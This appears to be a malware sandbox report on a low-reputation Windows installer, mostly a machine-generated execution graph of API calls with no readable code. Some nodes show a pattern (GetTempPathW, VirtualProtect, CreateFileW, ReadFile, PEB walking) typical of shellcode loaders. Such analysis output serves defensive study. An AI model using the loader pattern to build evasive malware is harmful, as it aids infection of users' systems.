                                                                                          Reputation:low

                                                                                          Disassembly

                                                                                          Code Analysis

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:12%
                                                                                            Dynamic/Decrypted Code Coverage:6.1%
                                                                                            Signature Coverage:22.2%
                                                                                            Total number of Nodes:1335
                                                                                            Total number of Limit Nodes:25

                                                                                            Graph

                                                                                            execution_graph 3904 401cc1 GetDlgItem GetClientRect 3905 4029e8 18 API calls 3904->3905 3906 401cf1 LoadImageA SendMessageA 3905->3906 3907 40287d 3906->3907 3908 401d0f DeleteObject 3906->3908 3908->3907 3909 401dc1 3910 4029e8 18 API calls 3909->3910 3911 401dc7 3910->3911 3912 4029e8 18 API calls 3911->3912 3913 401dd0 3912->3913 3914 4029e8 18 API calls 3913->3914 3915 401dd9 3914->3915 3916 4029e8 18 API calls 3915->3916 3917 401de2 3916->3917 3918 401423 25 API calls 3917->3918 3919 401de9 ShellExecuteA 3918->3919 3920 401e16 3919->3920 3921 401ec5 3922 4029e8 18 API calls 3921->3922 3923 401ecc GetFileVersionInfoSizeA 3922->3923 3924 401eef GlobalAlloc 3923->3924 3926 401f45 3923->3926 3925 401f03 GetFileVersionInfoA 3924->3925 3924->3926 3925->3926 3927 401f14 VerQueryValueA 3925->3927 3927->3926 3928 401f2d 3927->3928 3932 4059e3 wsprintfA 3928->3932 3930 401f39 3933 4059e3 wsprintfA 3930->3933 3932->3930 3933->3926 3934 4014ca 3935 404e23 25 API calls 3934->3935 3936 4014d1 3935->3936 3937 403f4b lstrcpynA lstrlenA 3938 40604c 3944 405ed0 3938->3944 3939 40683b 3940 405f51 GlobalFree 3941 405f5a GlobalAlloc 3940->3941 3941->3939 3941->3944 3942 405fd1 GlobalAlloc 3942->3939 3942->3944 3943 405fc8 GlobalFree 3943->3942 3944->3939 3944->3940 3944->3941 3944->3942 3944->3943 3340 401f51 3341 401f63 3340->3341 3342 402004 3340->3342 3361 4029e8 3341->3361 3344 401423 25 API calls 3342->3344 3351 40215b 3344->3351 3346 4029e8 18 API calls 3347 401f73 3346->3347 3348 401f88 LoadLibraryExA 3347->3348 3349 401f7b GetModuleHandleA 3347->3349 3348->3342 3350 401f98 GetProcAddress 3348->3350 3349->3348 3349->3350 3352 401fe5 3350->3352 3353 401fa8 3350->3353 3376 404e23 3352->3376 3354 401fb0 3353->3354 3355 401fc7 3353->3355 3373 401423 3354->3373 3367 72b210a0 3355->3367 3358 401fb8 3358->3351 3359 401ff8 FreeLibrary 3358->3359 3359->3351 3362 4029f4 3361->3362 3387 405aa7 3362->3387 3365 401f6a 3365->3346 3427 72b21000 3367->3427 3372 72b2118d 3372->3358 3374 404e23 25 API calls 3373->3374 3375 401431 3374->3375 3375->3358 3377 404e3e 3376->3377 3385 404ee1 3376->3385 3378 404e5b lstrlenA 3377->3378 3379 405aa7 18 API calls 3377->3379 3380 404e84 3378->3380 3381 404e69 lstrlenA 3378->3381 3379->3378 3382 404e97 3380->3382 3383 404e8a SetWindowTextA 3380->3383 3384 404e7b lstrcatA 3381->3384 3381->3385 3382->3385 3386 404e9d SendMessageA SendMessageA SendMessageA 3382->3386 3383->3382 3384->3380 3385->3358 3386->3385 3392 405ab4 3387->3392 3388 405cca 3389 402a15 3388->3389 3422 405a85 lstrcpynA 3388->3422 3389->3365 3406 405ce3 3389->3406 3391 405b48 GetVersion 3395 405b55 3391->3395 3392->3388 3392->3391 3393 405ca1 lstrlenA 3392->3393 3397 405aa7 10 API calls 3392->3397 3401 405ce3 5 API calls 3392->3401 3420 4059e3 wsprintfA 3392->3420 3421 405a85 lstrcpynA 3392->3421 3393->3392 3395->3392 3398 405bc0 GetSystemDirectoryA 3395->3398 3400 405bd3 GetWindowsDirectoryA 3395->3400 3402 405c07 SHGetSpecialFolderLocation 3395->3402 3403 405aa7 10 API calls 3395->3403 3404 405c4a lstrcatA 3395->3404 3415 40596c RegOpenKeyExA 3395->3415 3397->3393 3398->3395 3400->3395 3401->3392 3402->3395 3405 405c1f SHGetPathFromIDListA CoTaskMemFree 3402->3405 3403->3395 3404->3392 3405->3395 3408 405cef 3406->3408 3407 405d57 3409 405d5b CharPrevA 3407->3409 3412 405d76 3407->3412 3408->3407 3410 405d4c CharNextA 3408->3410 3413 405d3a CharNextA 3408->3413 3414 405d47 CharNextA 3408->3414 3423 4055a3 3408->3423 3409->3407 3410->3407 3410->3408 3412->3365 3413->3408 3414->3410 3416 4059dd 3415->3416 3417 40599f RegQueryValueExA 3415->3417 3416->3395 3418 4059c0 RegCloseKey 3417->3418 3418->3416 3420->3392 3421->3392 3422->3389 3424 4055a9 3423->3424 3425 4055bc 3424->3425 3426 4055af CharNextA 3424->3426 3425->3408 3426->3424 3428 72b2100c GetTempPathW 3427->3428 3429 72b21030 3428->3429 3430 72b21045 VirtualProtect CreateFileW ReadFile 3429->3430 3430->3372 3952 4014d6 3957 4029cb 3952->3957 3954 4014dc Sleep 3956 40287d 3954->3956 3958 405aa7 18 API calls 3957->3958 3959 4029df 3958->3959 3959->3954 3965 402858 SendMessageA 3966 402872 InvalidateRect 3965->3966 3967 40287d 3965->3967 3966->3967 3968 4018d8 3969 40190f 3968->3969 3970 4029e8 18 API calls 3969->3970 3971 401914 3970->3971 3972 4053aa 68 API calls 3971->3972 3973 40191d 3972->3973 3974 402259 3975 4029e8 18 API calls 3974->3975 3976 402267 3975->3976 3977 4029e8 18 API calls 3976->3977 3978 402270 3977->3978 3979 4029e8 18 API calls 3978->3979 3980 40227a GetPrivateProfileStringA 3979->3980 3981 40155b 3982 401577 ShowWindow 3981->3982 3983 40157e 3981->3983 3982->3983 3984 40158c ShowWindow 3983->3984 3985 40287d 3983->3985 3984->3985 3986 4018db 3987 4029e8 18 API calls 3986->3987 3988 4018e2 3987->3988 3989 405346 MessageBoxIndirectA 3988->3989 3990 4018eb 3989->3990 3991 404f61 3992 404f82 GetDlgItem GetDlgItem GetDlgItem 3991->3992 3993 40510d 3991->3993 4037 403e6c SendMessageA 3992->4037 3995 405116 GetDlgItem CreateThread CloseHandle 3993->3995 3996 40513e 3993->3996 3995->3996 3998 405169 3996->3998 3999 405155 ShowWindow ShowWindow 3996->3999 4000 40518b 3996->4000 3997 404ff3 4004 404ffa GetClientRect GetSystemMetrics SendMessageA SendMessageA 3997->4004 4001 4051a0 ShowWindow 3998->4001 4002 40517a 3998->4002 4005 4051c7 3998->4005 4042 403e6c SendMessageA 3999->4042 4046 403e9e 4000->4046 4009 4051c0 4001->4009 4010 4051b2 4001->4010 4043 403e10 4002->4043 4011 405069 4004->4011 4012 40504d SendMessageA SendMessageA 4004->4012 4005->4000 4013 4051d2 SendMessageA 4005->4013 4008 405199 4015 403e10 SendMessageA 4009->4015 4014 404e23 25 API calls 4010->4014 4016 40507c 4011->4016 4017 40506e SendMessageA 4011->4017 4012->4011 4013->4008 4018 4051eb CreatePopupMenu 4013->4018 4014->4009 4015->4005 4038 403e37 4016->4038 4017->4016 4020 405aa7 18 API calls 4018->4020 4021 4051fb AppendMenuA 4020->4021 4023 405221 4021->4023 4024 40520e GetWindowRect 4021->4024 4022 40508c 4025 405095 ShowWindow 4022->4025 4026 4050c9 GetDlgItem SendMessageA 4022->4026 4027 40522a TrackPopupMenu 4023->4027 4024->4027 4028 4050b8 4025->4028 4029 4050ab ShowWindow 4025->4029 4026->4008 4030 4050f0 SendMessageA SendMessageA 4026->4030 4027->4008 4031 405248 4027->4031 4041 403e6c SendMessageA 4028->4041 4029->4028 4030->4008 4032 405264 SendMessageA 4031->4032 4032->4032 4034 405281 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4032->4034 4035 4052a3 SendMessageA 4034->4035 4035->4035 4036 4052c4 GlobalUnlock SetClipboardData CloseClipboard 4035->4036 4036->4008 4037->3997 4039 405aa7 18 API calls 4038->4039 4040 403e42 SetDlgItemTextA 4039->4040 4040->4022 4041->4026 4042->3998 4044 403e17 4043->4044 4045 403e1d SendMessageA 4043->4045 4044->4045 4045->4000 4047 403eb6 GetWindowLongA 4046->4047 4057 403f3f 4046->4057 4048 403ec7 4047->4048 4047->4057 4049 403ed6 GetSysColor 4048->4049 4050 403ed9 4048->4050 4049->4050 4051 403ee9 SetBkMode 4050->4051 4052 403edf SetTextColor 4050->4052 4053 403f01 GetSysColor 4051->4053 4054 403f07 4051->4054 4052->4051 4053->4054 4055 403f18 4054->4055 4056 403f0e SetBkColor 4054->4056 4055->4057 4058 403f32 CreateBrushIndirect 4055->4058 4059 403f2b DeleteObject 4055->4059 4056->4055 4057->4008 4058->4057 4059->4058 4060 403964 4061 403ab7 4060->4061 4062 40397c 4060->4062 4063 403b08 4061->4063 4064 403ac8 GetDlgItem GetDlgItem 4061->4064 4062->4061 4065 403988 4062->4065 4067 403b62 4063->4067 4077 401389 2 API calls 4063->4077 4066 403e37 19 API calls 4064->4066 4068 403993 SetWindowPos 4065->4068 4069 4039a6 4065->4069 4072 403af2 SetClassLongA 4066->4072 4073 403e83 SendMessageA 4067->4073 4078 403ab2 4067->4078 4068->4069 4070 4039c3 4069->4070 4071 4039ab ShowWindow 4069->4071 4074 4039e5 4070->4074 4075 4039cb DestroyWindow 4070->4075 4071->4070 4076 40140b 2 API calls 4072->4076 4099 403b74 4073->4099 4080 4039ea SetWindowLongA 4074->4080 4081 4039fb 4074->4081 4079 403dc0 4075->4079 4076->4063 4082 403b3a 4077->4082 4079->4078 4088 403df1 ShowWindow 4079->4088 4080->4078 4085 403a72 4081->4085 4086 403a07 GetDlgItem 4081->4086 4082->4067 4087 403b3e SendMessageA 4082->4087 4083 40140b 2 API calls 4083->4099 4084 403dc2 DestroyWindow EndDialog 4084->4079 4091 403e9e 8 API calls 4085->4091 4089 403a37 4086->4089 4090 403a1a SendMessageA IsWindowEnabled 4086->4090 4087->4078 4088->4078 4093 403a44 4089->4093 4095 403a8b SendMessageA 4089->4095 4096 403a57 4089->4096 4103 403a3c 4089->4103 4090->4078 4090->4089 4091->4078 4092 405aa7 18 API calls 4092->4099 4093->4095 4093->4103 4094 403e10 SendMessageA 4094->4085 4095->4085 4097 403a74 4096->4097 4098 403a5f 4096->4098 4101 40140b 2 API calls 4097->4101 4100 40140b 2 API calls 4098->4100 4099->4078 4099->4083 4099->4084 4099->4092 4102 403e37 19 API calls 4099->4102 4104 403e37 19 API calls 4099->4104 4119 403d02 DestroyWindow 4099->4119 4100->4103 4101->4103 4102->4099 4103->4085 4103->4094 4105 403bef GetDlgItem 4104->4105 4106 403c04 4105->4106 4107 403c0c ShowWindow EnableWindow 4105->4107 4106->4107 4128 403e59 EnableWindow 4107->4128 4109 403c36 EnableWindow 4112 403c4a 4109->4112 4110 403c4f GetSystemMenu EnableMenuItem SendMessageA 4111 403c7f SendMessageA 4110->4111 4110->4112 4111->4112 4112->4110 4129 403e6c SendMessageA 4112->4129 4130 405a85 lstrcpynA 4112->4130 4115 403cad lstrlenA 4116 405aa7 18 API calls 4115->4116 4117 403cbe SetWindowTextA 4116->4117 4118 401389 2 API calls 4117->4118 4118->4099 4119->4079 4120 403d1c CreateDialogParamA 4119->4120 4120->4079 4121 403d4f 4120->4121 4122 403e37 19 API calls 4121->4122 4123 403d5a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4122->4123 4124 401389 2 API calls 4123->4124 4125 403da0 4124->4125 4125->4078 4126 403da8 ShowWindow 4125->4126 4127 403e83 SendMessageA 4126->4127 4127->4079 4128->4109 4129->4112 4130->4115 4131 402164 4132 4029e8 18 API calls 4131->4132 4133 40216a 4132->4133 4134 4029e8 18 API calls 4133->4134 4135 402173 4134->4135 4136 4029e8 18 API calls 4135->4136 4137 40217c 4136->4137 4138 405d7c 2 API calls 4137->4138 4139 402185 4138->4139 4140 402196 lstrlenA lstrlenA 4139->4140 4141 402189 4139->4141 4142 404e23 25 API calls 4140->4142 4143 404e23 25 API calls 4141->4143 4144 4021d2 SHFileOperationA 4142->4144 4145 402191 4143->4145 4144->4141 4144->4145 4146 4019e6 4147 4029e8 18 API calls 4146->4147 4148 4019ef ExpandEnvironmentStringsA 4147->4148 4149 401a03 4148->4149 4151 401a16 4148->4151 4150 401a08 lstrcmpA 4149->4150 4149->4151 4150->4151 4152 4021e6 4153 402200 4152->4153 4154 4021ed 4152->4154 4155 405aa7 18 API calls 4154->4155 4156 4021fa 4155->4156 4157 405346 MessageBoxIndirectA 4156->4157 4157->4153 4165 401c6d 4166 4029cb 18 API calls 4165->4166 4167 401c73 IsWindow 4166->4167 4168 4019d6 4167->4168 4169 4025ed 4170 4025f4 4169->4170 4171 40287d 4169->4171 4172 4025fa FindClose 4170->4172 4172->4171 4173 40266e 4174 4029e8 18 API calls 4173->4174 4176 40267c 4174->4176 4175 402692 4178 40573d 2 API calls 4175->4178 4176->4175 4177 4029e8 18 API calls 4176->4177 4177->4175 4179 402698 4178->4179 4199 40575c GetFileAttributesA CreateFileA 4179->4199 4181 4026a5 4182 4026b1 GlobalAlloc 4181->4182 4183 40274e 4181->4183 4184 402745 CloseHandle 4182->4184 4185 4026ca 4182->4185 4186 402756 DeleteFileA 4183->4186 4187 402769 4183->4187 4184->4183 4200 4031da SetFilePointer 4185->4200 4186->4187 4189 4026d0 4190 4031a8 ReadFile 4189->4190 4191 4026d9 GlobalAlloc 4190->4191 4192 4026e9 4191->4192 4193 40271d WriteFile GlobalFree 4191->4193 4195 402f01 47 API calls 4192->4195 4194 402f01 47 API calls 4193->4194 4196 402742 4194->4196 4198 4026f6 4195->4198 4196->4184 4197 402714 GlobalFree 4197->4193 4198->4197 4199->4181 4200->4189 4201 40276f 4202 4029cb 18 API calls 4201->4202 4203 402775 4202->4203 4204 4027b0 4203->4204 4205 402799 4203->4205 4210 40264e 4203->4210 4208 4027c6 4204->4208 4209 4027ba 4204->4209 4206 4027ad 4205->4206 4207 40279e 4205->4207 4216 4059e3 wsprintfA 4206->4216 4215 405a85 lstrcpynA 4207->4215 4212 405aa7 18 API calls 4208->4212 4211 4029cb 18 API calls 4209->4211 4211->4210 4212->4210 4215->4210 4216->4210 4217 4014f0 SetForegroundWindow 4218 40287d 4217->4218 4219 404772 GetDlgItem GetDlgItem 4220 4047c6 7 API calls 4219->4220 4223 4049e3 4219->4223 4221 40486c DeleteObject 4220->4221 4222 40485f SendMessageA 4220->4222 4224 404877 4221->4224 4222->4221 4234 404acd 4223->4234 4249 404a57 4223->4249 4272 4046f2 SendMessageA 4223->4272 4225 4048ae 4224->4225 4228 405aa7 18 API calls 4224->4228 4226 403e37 19 API calls 4225->4226 4232 4048c2 4226->4232 4227 404b7c 4229 404b91 4227->4229 4230 404b85 SendMessageA 4227->4230 4231 404890 SendMessageA SendMessageA 4228->4231 4240 404ba3 ImageList_Destroy 4229->4240 4241 404baa 4229->4241 4250 404bba 4229->4250 4230->4229 4231->4224 4237 403e37 19 API calls 4232->4237 4233 4049d6 4239 403e9e 8 API calls 4233->4239 4234->4227 4234->4233 4238 404b26 SendMessageA 4234->4238 4235 404abf SendMessageA 4235->4234 4254 4048d0 4237->4254 4238->4233 4243 404b3b SendMessageA 4238->4243 4244 404d6c 4239->4244 4240->4241 4245 404bb3 GlobalFree 4241->4245 4241->4250 4242 404d20 4242->4233 4251 404d32 ShowWindow GetDlgItem ShowWindow 4242->4251 4247 404b4e 4243->4247 4245->4250 4246 4049a4 GetWindowLongA SetWindowLongA 4248 4049bd 4246->4248 4259 404b5f SendMessageA 4247->4259 4252 4049c3 ShowWindow 4248->4252 4253 4049db 4248->4253 4249->4234 4249->4235 4250->4242 4258 40140b 2 API calls 4250->4258 4266 404bec 4250->4266 4251->4233 4270 403e6c SendMessageA 4252->4270 4271 403e6c SendMessageA 4253->4271 4254->4246 4257 40491f SendMessageA 4254->4257 4260 40499e 4254->4260 4261 40495b SendMessageA 4254->4261 4262 40496c SendMessageA 4254->4262 4257->4254 4258->4266 4259->4227 4260->4246 4260->4248 4261->4254 4262->4254 4263 404cf6 InvalidateRect 4263->4242 4264 404d0c 4263->4264 4277 404610 4264->4277 4265 404c1a SendMessageA 4269 404c30 4265->4269 4266->4265 4266->4269 4268 404ca4 SendMessageA SendMessageA 4268->4269 4269->4263 4269->4268 4270->4233 4271->4223 4273 404751 SendMessageA 4272->4273 4274 404715 GetMessagePos ScreenToClient SendMessageA 4272->4274 4275 404749 4273->4275 4274->4275 4276 40474e 4274->4276 4275->4249 4276->4273 4278 40462a 4277->4278 4279 405aa7 18 API calls 4278->4279 4280 40465f 4279->4280 4281 405aa7 18 API calls 4280->4281 4282 40466a 4281->4282 4283 405aa7 18 API calls 4282->4283 4284 40469b lstrlenA wsprintfA SetDlgItemTextA 4283->4284 4284->4242 4285 404d73 4286 404d81 4285->4286 4287 404d98 4285->4287 4288 404e01 4286->4288 4289 404d87 4286->4289 4290 404da6 IsWindowVisible 4287->4290 4296 404dbd 4287->4296 4292 404e07 CallWindowProcA 4288->4292 4291 403e83 SendMessageA 4289->4291 4290->4288 4293 404db3 4290->4293 4294 404d91 4291->4294 4292->4294 4295 4046f2 5 API calls 4293->4295 4295->4296 4296->4292 4304 405a85 lstrcpynA 4296->4304 4298 404dec 4305 4059e3 wsprintfA 4298->4305 4300 404df3 4301 40140b 2 API calls 4300->4301 4302 404dfa 4301->4302 4306 405a85 lstrcpynA 4302->4306 4304->4298 4305->4300 4306->4288 4307 19f1ad 4309 19f20c 4307->4309 4321 19e9b7 GetPEB 4307->4321 4310 19f2f7 4309->4310 4312 19f304 4309->4312 4320 19f2ba 4309->4320 4322 19f4dd 4310->4322 4312->4320 4335 19e557 4312->4335 4314 19f40a 4315 19f477 4314->4315 4317 19e557 4 API calls 4314->4317 4314->4320 4316 19e557 4 API calls 4315->4316 4318 19f496 4316->4318 4317->4314 4318->4320 4344 19e4a6 4318->4344 4321->4309 4353 19e9b7 GetPEB 4322->4353 4324 19f69e 4327 19e557 4 API calls 4324->4327 4334 19f5f4 4324->4334 4325 19f4eb 4325->4324 4325->4334 4354 19e658 4325->4354 4328 19f6ea 4327->4328 4329 19f744 4328->4329 4331 19e557 4 API calls 4328->4331 4328->4334 4330 19e557 4 API calls 4329->4330 4332 19f75e 4330->4332 4331->4328 4333 19e4a6 4 API calls 4332->4333 4332->4334 4333->4334 4334->4320 4336 19e572 4335->4336 4337 19e9f6 GetPEB 4336->4337 4338 19e593 4337->4338 4339 19e59b 4338->4339 4340 19e625 4338->4340 4342 19e6f2 3 API calls 4339->4342 4378 19e470 4340->4378 4343 19e60c 4342->4343 4343->4314 4345 19e4c1 4344->4345 4346 19e9f6 GetPEB 4345->4346 4347 19e4e2 4346->4347 4348 19e52c 4347->4348 4349 19e4e6 4347->4349 4381 19e482 4348->4381 4350 19e6f2 3 API calls 4349->4350 4352 19e521 4350->4352 4352->4320 4353->4325 4355 19e66b 4354->4355 4363 19e9f6 GetPEB 4355->4363 4357 19e68c 4358 19e690 4357->4358 4359 19e6d6 4357->4359 4365 19e6f2 GetPEB 4358->4365 4369 19e494 4359->4369 4362 19e6cb 4362->4324 4364 19ea19 4363->4364 4364->4357 4366 19e757 4365->4366 4372 19ea34 GetPEB 4366->4372 4368 19e7cb 4368->4362 4370 19e6f2 3 API calls 4369->4370 4371 19e49e 4370->4371 4371->4362 4373 19ea47 4372->4373 4375 19ea5b 4373->4375 4376 19e906 GetPEB 4373->4376 4375->4368 4377 19e931 4376->4377 4377->4373 4379 19e6f2 3 API calls 4378->4379 4380 19e47a 4379->4380 4380->4343 4382 19e6f2 3 API calls 4381->4382 4383 19e48c 4382->4383 4383->4352 4384 404275 4385 4042b3 4384->4385 4386 4042a6 4384->4386 4387 4042bc GetDlgItem 4385->4387 4420 40431f 4385->4420 4445 40532a GetDlgItemTextA 4386->4445 4389 4042d0 4387->4389 4393 4042e4 SetWindowTextA 4389->4393 4397 40560c 4 API calls 4389->4397 4390 404403 4394 40458f 4390->4394 4447 40532a GetDlgItemTextA 4390->4447 4391 4042ad 4392 405ce3 5 API calls 4391->4392 4392->4385 4398 403e37 19 API calls 4393->4398 4396 403e9e 8 API calls 4394->4396 4401 4045a3 4396->4401 4402 4042da 4397->4402 4403 404302 4398->4403 4399 405aa7 18 API calls 4404 404395 SHBrowseForFolderA 4399->4404 4400 40442f 4405 405659 18 API calls 4400->4405 4402->4393 4409 405578 3 API calls 4402->4409 4406 403e37 19 API calls 4403->4406 4404->4390 4407 4043ad CoTaskMemFree 4404->4407 4408 404435 4405->4408 4410 404310 4406->4410 4411 405578 3 API calls 4407->4411 4448 405a85 lstrcpynA 4408->4448 4409->4393 4446 403e6c SendMessageA 4410->4446 4413 4043ba 4411->4413 4417 4043f1 SetDlgItemTextA 4413->4417 4421 405aa7 18 API calls 4413->4421 4415 40444c 4419 405da3 3 API calls 4415->4419 4416 404318 4418 405da3 3 API calls 4416->4418 4417->4390 4418->4420 4428 404454 4419->4428 4420->4390 4420->4394 4420->4399 4422 4043d9 lstrcmpiA 4421->4422 4422->4417 4424 4043ea lstrcatA 4422->4424 4423 40448e 4449 405a85 lstrcpynA 4423->4449 4424->4417 4426 404497 4427 40560c 4 API calls 4426->4427 4429 40449d GetDiskFreeSpaceA 4427->4429 4428->4423 4432 4055bf 2 API calls 4428->4432 4433 4044e1 4428->4433 4431 4044bf MulDiv 4429->4431 4429->4433 4431->4433 4432->4428 4434 40453e 4433->4434 4436 404610 21 API calls 4433->4436 4435 404561 4434->4435 4438 40140b 2 API calls 4434->4438 4450 403e59 EnableWindow 4435->4450 4437 404530 4436->4437 4439 404540 SetDlgItemTextA 4437->4439 4440 404535 4437->4440 4438->4435 4439->4434 4442 404610 21 API calls 4440->4442 4442->4434 4443 40457d 4443->4394 4451 40420a 4443->4451 4445->4391 4446->4416 4447->4400 4448->4415 4449->4426 4450->4443 4452 404218 4451->4452 4453 40421d SendMessageA 4451->4453 4452->4453 4453->4394 4454 4022f5 4455 4022fb 4454->4455 4456 4029e8 18 API calls 4455->4456 4457 40230d 4456->4457 4458 4029e8 18 API calls 4457->4458 4459 402317 RegCreateKeyExA 4458->4459 4460 402341 4459->4460 4461 40264e 4459->4461 4462 402359 4460->4462 4463 4029e8 18 API calls 4460->4463 4464 402365 4462->4464 4466 4029cb 18 API calls 4462->4466 4465 402352 lstrlenA 4463->4465 4467 402380 RegSetValueExA 4464->4467 4468 402f01 47 API calls 4464->4468 4465->4462 4466->4464 4469 402396 RegCloseKey 4467->4469 4468->4467 4469->4461 4471 4027f5 4472 4029cb 18 API calls 4471->4472 4473 4027fb 4472->4473 4474 40282c 4473->4474 4475 40264e 4473->4475 4477 402809 4473->4477 4474->4475 4476 405aa7 18 API calls 4474->4476 4476->4475 4477->4475 4479 4059e3 wsprintfA 4477->4479 4479->4475 4480 4024f8 4481 4029cb 18 API calls 4480->4481 4486 402502 4481->4486 4482 402578 4483 402536 ReadFile 4483->4482 4483->4486 4484 40257a 4489 4059e3 wsprintfA 4484->4489 4485 40258a 4485->4482 4488 4025a0 SetFilePointer 4485->4488 4486->4482 4486->4483 4486->4484 4486->4485 4488->4482 4489->4482 4490 4016fa 4491 4029e8 18 API calls 4490->4491 4492 401701 SearchPathA 4491->4492 4493 40171c 4492->4493 4494 4014fe 4495 401506 4494->4495 4497 401519 4494->4497 4496 4029cb 18 API calls 4495->4496 4496->4497 4498 403f7f 4499 403f95 4498->4499 4504 4040a2 4498->4504 4502 403e37 19 API calls 4499->4502 4500 404111 4501 4041e5 4500->4501 4503 40411b GetDlgItem 4500->4503 4509 403e9e 8 API calls 4501->4509 4505 403feb 4502->4505 4506 404131 4503->4506 4507 4041a3 4503->4507 4504->4500 4504->4501 4508 4040e6 GetDlgItem SendMessageA 4504->4508 4510 403e37 19 API calls 4505->4510 4506->4507 4514 404157 6 API calls 4506->4514 4507->4501 4511 4041b5 4507->4511 4529 403e59 EnableWindow 4508->4529 4519 4041e0 4509->4519 4513 403ff8 CheckDlgButton 4510->4513 4515 4041bb SendMessageA 4511->4515 4516 4041cc 4511->4516 4527 403e59 EnableWindow 4513->4527 4514->4507 4515->4516 4516->4519 4520 4041d2 SendMessageA 4516->4520 4517 40410c 4521 40420a SendMessageA 4517->4521 4520->4519 4521->4500 4522 404016 GetDlgItem 4528 403e6c SendMessageA 4522->4528 4524 40402c SendMessageA 4525 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4524->4525 4526 40404a GetSysColor 4524->4526 4525->4519 4526->4525 4527->4522 4528->4524 4529->4517 4530 401000 4531 401037 BeginPaint GetClientRect 4530->4531 4534 40100c DefWindowProcA 4530->4534 4532 4010f3 4531->4532 4536 401073 CreateBrushIndirect FillRect DeleteObject 4532->4536 4537 4010fc 4532->4537 4535 401179 4534->4535 4536->4532 4538 401102 CreateFontIndirectA 4537->4538 4539 401167 EndPaint 4537->4539 4538->4539 4540 401112 6 API calls 4538->4540 4539->4535 4540->4539 4555 401b06 4556 401b13 4555->4556 4557 401b57 4555->4557 4560 4021ed 4556->4560 4565 401b2a 4556->4565 4558 401b80 GlobalAlloc 4557->4558 4559 401b5b 4557->4559 4561 405aa7 18 API calls 4558->4561 4568 401b9b 4559->4568 4576 405a85 lstrcpynA 4559->4576 4562 405aa7 18 API calls 4560->4562 4561->4568 4564 4021fa 4562->4564 4569 405346 MessageBoxIndirectA 4564->4569 4574 405a85 lstrcpynA 4565->4574 4566 401b6d GlobalFree 4566->4568 4569->4568 4570 401b39 4575 405a85 lstrcpynA 4570->4575 4572 401b48 4577 405a85 lstrcpynA 4572->4577 4574->4570 4575->4572 4576->4566 4577->4568 4578 402607 4579 40260a 4578->4579 4582 402622 4578->4582 4580 402617 FindNextFileA 4579->4580 4581 402661 4580->4581 4580->4582 4584 405a85 lstrcpynA 4581->4584 4584->4582 3894 401389 3896 401390 3894->3896 3895 4013fe 3896->3895 3897 4013cb MulDiv SendMessageA 3896->3897 3897->3896 4592 401c8a 4593 4029cb 18 API calls 4592->4593 4594 401c91 4593->4594 4595 4029cb 18 API calls 4594->4595 4596 401c99 GetDlgItem 4595->4596 4597 4024aa 4596->4597 4598 40248e 4599 4029e8 18 API calls 4598->4599 4600 402495 4599->4600 4603 40575c GetFileAttributesA CreateFileA 4600->4603 4602 4024a1 4603->4602 4604 402012 4605 4029e8 18 API calls 4604->4605 4606 402019 4605->4606 4607 4029e8 18 API calls 4606->4607 4608 402023 4607->4608 4609 4029e8 18 API calls 4608->4609 4610 40202c 4609->4610 4611 4029e8 18 API calls 4610->4611 4612 402036 4611->4612 4613 4029e8 18 API calls 4612->4613 4615 402040 4613->4615 4614 402054 CoCreateInstance 4619 402073 4614->4619 4620 402129 4614->4620 4615->4614 4616 4029e8 18 API calls 4615->4616 4616->4614 4617 401423 25 API calls 4618 40215b 4617->4618 4619->4620 4621 402108 MultiByteToWideChar 4619->4621 4620->4617 4620->4618 4621->4620 4622 19eacd 4627 19e9b7 GetPEB 4622->4627 4624 19eb32 4625 19ec93 4624->4625 4628 19f1b5 4624->4628 4627->4624 4642 19e9b7 GetPEB 4628->4642 4630 19f20c 4631 19f2f7 4630->4631 4633 19f304 4630->4633 4641 19f2ba 4630->4641 4632 19f4dd 5 API calls 4631->4632 4632->4641 4634 19e557 4 API calls 4633->4634 4633->4641 4635 19f40a 4634->4635 4636 19f477 4635->4636 4638 19e557 4 API calls 4635->4638 4635->4641 4637 19e557 4 API calls 4636->4637 4639 19f496 4637->4639 4638->4635 4640 19e4a6 4 API calls 4639->4640 4639->4641 4640->4641 4641->4625 4642->4630 4643 402215 4644 402223 4643->4644 4645 40221d 4643->4645 4647 402233 4644->4647 4648 4029e8 18 API calls 4644->4648 4646 4029e8 18 API calls 4645->4646 4646->4644 4649 402241 4647->4649 4650 4029e8 18 API calls 4647->4650 4648->4647 4651 4029e8 18 API calls 4649->4651 4650->4649 4652 40224a WritePrivateProfileStringA 4651->4652 4653 401595 4654 4029e8 18 API calls 4653->4654 4655 40159c SetFileAttributesA 4654->4655 4656 4015ae 4655->4656 4657 401d95 4658 4029cb 18 API calls 4657->4658 4659 401d9b 4658->4659 4660 4029cb 18 API calls 4659->4660 4661 401da4 4660->4661 4662 401db6 EnableWindow 4661->4662 4663 401dab ShowWindow 4661->4663 4664 40287d 4662->4664 4663->4664 4665 401e95 4666 4029e8 18 API calls 4665->4666 4667 401e9c 4666->4667 4668 405d7c 2 API calls 4667->4668 4669 401ea2 4668->4669 4671 401eb4 4669->4671 4672 4059e3 wsprintfA 4669->4672 4672->4671 4673 401696 4674 4029e8 18 API calls 4673->4674 4675 40169c GetFullPathNameA 4674->4675 4676 4016d4 4675->4676 4677 4016b3 4675->4677 4678 4016e8 GetShortPathNameA 4676->4678 4679 40287d 4676->4679 4677->4676 4680 405d7c 2 API calls 4677->4680 4678->4679 4681 4016c4 4680->4681 4681->4676 4683 405a85 lstrcpynA 4681->4683 4683->4676 4691 402419 4701 402af2 4691->4701 4693 402423 4694 4029cb 18 API calls 4693->4694 4695 40242c 4694->4695 4696 402443 RegEnumKeyA 4695->4696 4697 40244f RegEnumValueA 4695->4697 4699 40264e 4695->4699 4698 402468 RegCloseKey 4696->4698 4697->4698 4697->4699 4698->4699 4702 4029e8 18 API calls 4701->4702 4703 402b0b 4702->4703 4704 402b19 RegOpenKeyExA 4703->4704 4704->4693 4705 402299 4706 4022c9 4705->4706 4707 40229e 4705->4707 4709 4029e8 18 API calls 4706->4709 4708 402af2 19 API calls 4707->4708 4710 4022a5 4708->4710 4711 4022d0 4709->4711 4712 4029e8 18 API calls 4710->4712 4715 4022e6 4710->4715 4716 402a28 RegOpenKeyExA 4711->4716 4713 4022b6 RegDeleteValueA RegCloseKey 4712->4713 4713->4715 4723 402a53 4716->4723 4724 402a9f 4716->4724 4717 402a79 RegEnumKeyA 4718 402a8b RegCloseKey 4717->4718 4717->4723 4720 405da3 3 API calls 